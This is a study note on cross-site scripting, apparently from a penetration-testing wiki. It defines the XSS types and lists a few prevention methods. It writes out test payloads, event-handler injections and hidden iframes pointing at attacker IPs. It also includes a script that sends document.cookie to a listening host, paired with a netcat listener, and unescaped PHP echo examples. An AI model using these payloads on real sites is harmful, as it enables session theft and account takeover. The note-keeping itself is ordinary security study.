[XSS] Cross Site Scripting
Links https://portswigger.net/web-security/cross-site-scripting https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A7-Cross-Site_Scripting_(XSS)
YouTube
https://www.youtube.com/watch?v=3pXeSkM7m3M&list=PLZOToVAK85MoYN8LF4vsGNtgwmLinMnW3
https://www.youtube.com/watch?v=3pXeSkM7m3M&list=PLZOToVAK85MqxEPGXA80NPMZEczZfA9ej&index=60
https://www.youtube.com/watch?v=I0SusAlT1wY&list=PLZOToVAK85MqxEPGXA80NPMZEczZfA9ej&index=63
XSS vulnerabilities are caused due to unsanitized user input that is then displayed on a web page in HTML format. These vulnerabilities allow malicious attackers to inject client side scripts, such as JavaScript, into web pages viewed by other users.
Although XSS attacks don't directly compromise a machine, these attacks can still have significant impacts, such as cookie stealing and authentication bypass, redirecting the victim’s browser to a malicious HTML page, and more."
**Only JavaScript or VbScript embedded in auth.y.com can read cookies belonging to auth.y.com**
reflected = non persistence, echoed back immediately. In the HTTP request!
stored = persistence, stored in web application
DOM XSS = lives within the DOM environment, a page's client-side script itself and soes not reach server-side code
Camouflage URL
tinyurl
iframes
link in a targeted email
<plaintext> tag/payload for testing
alert('abc');alert(document.cookie)
string.fromCharCode(xxx, xxx, xxx)
Payload example
<script>
x = '<!--<script>' < /script>/ - alert(1)
</script>
PHP code injection
<?
echo '<h4>Hello ' . $_GET['name'] . '</h4>';
?>
Browser Redirection and IFRAME Injection
.<iframe SRC="http://$ip/report" height = "0" width ="0"></iframe>
invisible iframe
.<iframe src="http://<me>:<myport>/something" height="0" width="0"></iframe>
Stealing Cookies and Session Information
.<iframe src="http://10.11.0.5/report" height = "0" width = "0"></iframe>
.<script> new Image().src="http:10.11.0.126/bogus.php?output="+document.cookie; </script>
nc -nlvp 80
<img src="logo.png" alt="<?= $_GET['name'] ?>">
Exploitation with Beef
https://www.youtube.com/watch?v=gU_zv8HIG2g&list=PLZOToVAK85MqxEPGXA80NPMZEczZfA9ej&index=177
https://www.youtube.com/watch?v=t-44ZsaeIQE&list=PLZOToVAK85MqxEPGXA80NPMZEczZfA9ej&index=199
Put the hook link in the web page by XSS
With event handlers
abc" onmouseover=alert("XSS") "
onclick, onload, onerror etc
<a onmouseover="alert('xss')">xss link</a>
<IMG SRC=# onmouseover="alert('xss')">
<IMG SRC=/ onerror="alert('xss')"></img>
How to prevent XSS
Encoding: < becomes
<
Filtering: becomes script
Validating: compare input against white list
Sanitization: combination of escaping, filtering and validation
Last updated
Was this helpful?